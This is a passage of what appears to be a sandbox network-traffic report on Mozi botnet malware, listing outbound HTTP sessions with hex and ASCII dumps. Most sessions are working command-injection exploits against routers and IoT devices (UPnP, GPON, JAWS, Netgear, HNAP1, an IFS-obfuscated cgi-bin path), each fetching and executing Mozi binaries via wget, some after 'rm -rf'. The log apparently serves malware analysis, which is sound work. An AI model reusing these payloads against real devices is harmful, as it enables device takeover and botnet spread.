3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        17192.168.2.2035196104.115.250.11480
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:03.853110075 CET582OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:59:04.186294079 CET583INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 208
                                                                                                        Expires: Wed, 06 Jan 2021 13:59:04 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:59:04 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 34 33 34 61 63 62 26 23 34 36 3b 31 36 30 39 39 34 31 35 34 34 26 23 34 36 3b 38 35 33 33 38 39 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;76434acb&#46;1609941544&#46;8533897</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        18192.168.2.204754245.196.102.17980
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:17.777331114 CET649OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 45.196.102.179:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:59:18.054861069 CET650INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 13:59:17 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 566
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        19192.168.2.2037970175.252.8.1848080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:24.779999018 CET683OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:59:25.038872004 CET683INHTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 30
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        2192.168.2.2054436107.170.200.20680
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:57:39.698870897 CET124OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 107.170.200.206:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 14:57:39.902827024 CET126INHTTP/1.1 405 Not Allowed
                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                        Date: Wed, 06 Jan 2021 13:57:39 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 182
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        20192.168.2.204292223.96.36.24380
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:38.626832008 CET752OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 15:00:05.078109980 CET876INHTTP/1.1 200 OK
                                                                                                        Cache-Control: no-cache
                                                                                                        Content-Type: text/html
                                                                                                        Content-Encoding: gzip
                                                                                                        Vary: Accept-Encoding
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 14:00:05 GMT
                                                                                                        Content-Length: 853
                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e af 8e 8a a2 59 56 b3 3c cd 97 d3 6a bd 6c f3 3a 9f a5 d9 32 cd eb ba aa d3 ab 79 be 4c 57 75 35 cd 9b a6 58 5e a4 ed 3c 4f eb fc 17 ad f3 a6 1d 3f be bb 3a 7a bc aa f3 b4 69 af cb fc b3 8f 26 d9 f4 ed 45 4d 30 66 db d3 aa ac ea 47 69 ce cf 47 47 df 7e 75 fa fa ab e7 6f 1e a5 3b ef f6 92 6f bf 79 f3 92 5e c9 da 75 f3 28 bd bf b3 23 1f d4 79 d6 54 cb 47 e9 19 30 58 66 65 fa 3a af 2f f3 3a 3d 05 1a d4 53 9d 53 5f 47 bf 4f b5 4e 33 ea b1 ce a7 79 71 29 08 15 4d ca 10 f6 76 76 e8 f3 66 55 2d 9b 3c 9d e4 d3 6c 4d 3f 1f 67 e9 bc ce cf 3f 9b b7 ed aa 79 74 f7 ee 45 d1 ce d7 93 f1 b4 5a dc 6d 7f 3a 5b 4e 7f b0 7e 7b 57 09 70 77 52 56 93 bb 8b ac 21 04 ee 36 f5 f4 6e 93 2d 56 65 de dc 9d 56 cb f3 e2 62 5d 67 6d 51 2d ef 5e e5 78 1d 9f 1c 35 d7 d4 76 31 a6 4f 04 59 0b e9 f7 9c e5 97 8c 78 73 ba cc 26 65 3e 7b 7c 37 3b 4a e5 2d 85 93 36 79 db 62 00 84 fe c7 6d bd ce 3f 56 7a 1e 9d 2d d3 6c 36 2b b8 51 5b d1 00 f3 b4 ac 2e d2 ea 9c 88 36 ab d6 2d 4d ce 0c bf d2 04 e1 43 7c 8f 4e c7 f9 bb dc cc d4 08 7d 35 05 35 49 d7 3c 6d 3e 19 88 0a 6d 45 c3 fc c1 58 09 30 ae ea 8b bb 7b 3b bb bb 77 e9 7f b3 7c b2 be d8 06 c0 9f 6e b6 b3 d5 aa 2c a6 8c 6f b3 5d 2d b7 af 8a e5 ac ba 6a c6 f3 76 51 1e 71 cb 0b 82 ce 83 03 52 b7 ec 65 e7 e1 5d c6 6a 3b bf cc 97 ed 76 5b 67 53 fc 75 5e d5 a6 83 ed b6 92 3e 4e df 7c 37 c5 f7 79 c3 9d 10 39 ce d7 35 8d b8 4e 67 45 76 b1 ac 68 86 e9 2f 0c 9b a8 bc 30 14 7c 43 1f 61 04 3e 49 d2 79 d6 d0 87 6d 7a 55 17 6d 4b 4c 9d 2d af d3 62 49 9d 2e 78 7c 80 6d 88 5a a7 3a 91 e9 15 bd b4 e6 29 c4 f7 d3 6c d5 ae 89 fb 98 e7 bc 77 c7 e9 33 96 89 65 4b 0c 08 36 c6 a4 b6 f3 ac a5 7f 72 0b 6b 51 cd d6 04 87 be f2 20 52 fb 36 4f 33 9e e1 f3 42 3f d4 6e 08 9d ee 74 af db 15 7d 72 5e 57 0b 1a 8b 0c 70 9c be 2c a9 d3 3c 9d ce f3 e9 5b ea d1 74 3b 23 7c 8a f6 da f0 c8 d9 d9 eb d4 9b cf 74 55 55 65 5a af 97 4b a2 3d 37 60 80 3f dd 04 8d 40 34 42 11 0a 61 c6 94 23 5c a7 4c ce 55 5e 2f 0a d2 09 c4 19 c0 19 00 66 05 89 65 5b d5 d4 25 91 93 3e 68 58 2a a0 43 68 34 f8 20 d6 05 d1 a3 ac e8 f7 7c 36 4e 8f 4b 92 bd 25 7d 7e 99 97 d7 e9 35 09 fb 94 34 d1 ac 68 98 5e 44 23 b0 5b 3a b9 26 c8 22 3c 3e c7 fd 10 c5 5b 31 f1 85 3b 27 fe 23 82 83 da f4 82 82 00 65 3e 3e cf ca 26 ff 78 fc ff 00 21 3f 1f df 6a 05 00 00
                                                                                                        Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"YV<jl:2yLWu5X^<O?:zi&EM0fGiGG~uo;oy^u(#yTG0Xfe:/:=SS_GON3yq)MvvfU-<lM?g?ytEZm:[N~{WpwRV!6n-VeVb]gmQ-^x5v1OYxs&e>{|7;J-6ybm?Vz-l6+Q[.6-MC|N}55I<m>mEX0{;w|n,o]-jvQqRe]j;v[gSu^>N|7y95NgEvh/0|Ca>IymzUmKL-bI.x|mZ:)lw3eK6rkQ R6O3B?nt}r^Wp,<[t;#|tUUeZK=7`?@4Ba#\LU^/fe[%>hX*Ch4 |6NK%}~54h^D#[:&"<>[1;'#e>>&x!?j
                                                                                                        Jan 6, 2021 15:00:05.087344885 CET877INHTTP/1.1 400 Bad Request
                                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                        Date: Wed, 06 Jan 2021 14:00:05 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 326
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        21192.168.2.204071850.21.190.1658443
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:52.727588892 CET816OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                                                        Data Raw:
                                                                                                        Data Ascii:


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        22192.168.2.204428634.117.168.15680
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:53.556488037 CET824OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 34.117.168.156:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 14:59:53.613742113 CET826INHTTP/1.0 404 Not Found
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Referrer-Policy: no-referrer
                                                                                                        Content-Length: 1567
                                                                                                        Date: Wed, 06 Jan 2021 13:59:53 GMT
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 